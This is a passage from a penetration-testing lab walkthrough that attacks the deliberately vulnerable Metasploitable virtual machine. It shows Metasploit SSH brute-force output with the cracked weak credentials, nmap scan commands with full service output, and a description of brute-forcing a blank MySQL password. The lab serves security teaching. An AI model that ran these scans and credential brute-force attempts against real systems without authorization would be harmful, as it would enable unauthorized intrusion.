[*] Command shell session 6 opened (10.0.0.5:47907 -> 10.0.0.27:22) at 2016-03-26 17:26:08 -0700
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 10.0.0.27 - Command shell session 6 closed.  Reason: Died from EOFError
msf auxiliary(ssh_login) >

That message tells us that the klog user doesn't have a home directory:

[+] 10.0.0.27:22 SSH - Success: 'klog:123456789' 'Could not chdir to home directory /home/klog: No such file or directory Could not chdir to home directory /home/klog: No such file or directory '

Seeing the Creds

Once you've got some creds:

msf auxiliary(ssh_login) > creds

Credentials
===========

host       origin     service       public    private    realm  private_type
----       ------     -------       ------    -------    -----  ------------
10.0.0.27  10.0.0.27  22/tcp (ssh)  msfadmin  msfadmin          Password
10.0.0.27  10.0.0.27  22/tcp (ssh)  user      user              Password
10.0.0.27  10.0.0.27  22/tcp (ssh)  postgres  postgres          Password
10.0.0.27  10.0.0.27  22/tcp (ssh)  service   service           Password
10.0.0.27  10.0.0.27  22/tcp (ssh)  sys       batman            Password
10.0.0.27  10.0.0.27  22/tcp (ssh)  klog      123456789         Password

Next step is getting some loot.

Usage Example: Metasploitable Virtual Box

Main page for Metasploitable virtual box: Metasploitable

As an example of how we can use metasploit, we'll be looking at the Metasploitable virtual box.

Setting Up Metasploitable

Downloaded the virtual disk image and loaded it up in a 64-bit Linux VirtualBox instance.

For the networking configuration, I had the VirtualBox instance running on a Mac and was attacking from a machine running Kali Linux. Both computers were on a private network and on the same subnet.

From VirtualBox, I created a bridged network adapter (meaning, VirtualBox can send/receive messages directly through that interface). Next, I flipped the switch on the VirtualBox, and away we went. The router automatically assigned an IP address to the Metasploitable VirtualBox.


Recon

Let's take a few first steps in Metasploit, using the Metasploitable virtual box.

Make a record-keeping box for stuff:

$ mkdir -p box/metasploitable

Start by using nmap to scan the host.

First, a fast scan with -F:

$ nmap -F 10.0.0.*

Then we can do a more extensive scan:

$ nmap -sS 10.0.0.*

This reveals the IP address of the VirtualBox, which is 10.0.0.27.

We can also do a deeper scan:

$ nmap -sS -sV -A 10.0.0.27

This will reveal an array of services, some of which may be exploitable using metasploit.

Sure enough, the verbose scan returns lots of good information:

$ nmap -sS -sV -A 10.0.0.27

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-22 18:30 PDT
Nmap scan report for 10.0.0.27
Host is up (0.016s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
|_ssl-date: 2016-03-23T01:31:31+00:00; +33s from scanner time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      42810/tcp  mountd
|   100005  1,2,3      45599/udp  mountd
|   100021  1,3,4      34385/tcp  nlockmgr
|   100021  1,3,4      60702/udp  nlockmgr
|   100024  1          38085/udp  status
|_  100024  1          52004/tcp  status
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    Java RMI Registry
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 53
|   Version: .0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, SupportsCompression
|   Status: Autocommit
|_  Salt: w$K,8vk7k8tagd@PR*zK
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    Unknown security type (33554432)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
| irc-info: 
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN 
|   uptime: 0 days, 1:05:20
|   source ident: nmap
|   source host: 6D4CD63B.D3975B40.7B559A54.IP
|_  error: Closing Link: cxfhgnbdt[10.0.0.25] (Quit: cxfhgnbdt)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP
|_  System time: 2016-03-22T21:31:31-04:00

TRACEROUTE
HOP RTT      ADDRESS
1   16.11 ms 10.0.0.27

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.31 seconds

MySQL

Let's focus on the MySQL service:

3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 53
|   Version: .0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, SupportsCompression
|   Status: Autocommit
|_  Salt: w$K,8vk7k8tagd@PR*zK

We can brute-force MySQL, then use it to access files on the remote machine.

More info at Metasploitable/MySQL.

Wrapping Up and Moving On

After the nmap scan of the Metasploitable virtual box, we saw many services running, exposing this server's soft underbelly.

We began with MySQL. We were able to use Metasploit to brute-force the MySQL login. This was pretty trivial, since the password was blank.

Now that we've compromised the MySQL database, we've seen that there are several web services running: two instances of TikiWiki, an instance of Damn Vulnerable Web App, and information from/about OWASP. The MySQL database gave us plenty of new attack vectors to dive into.

Flags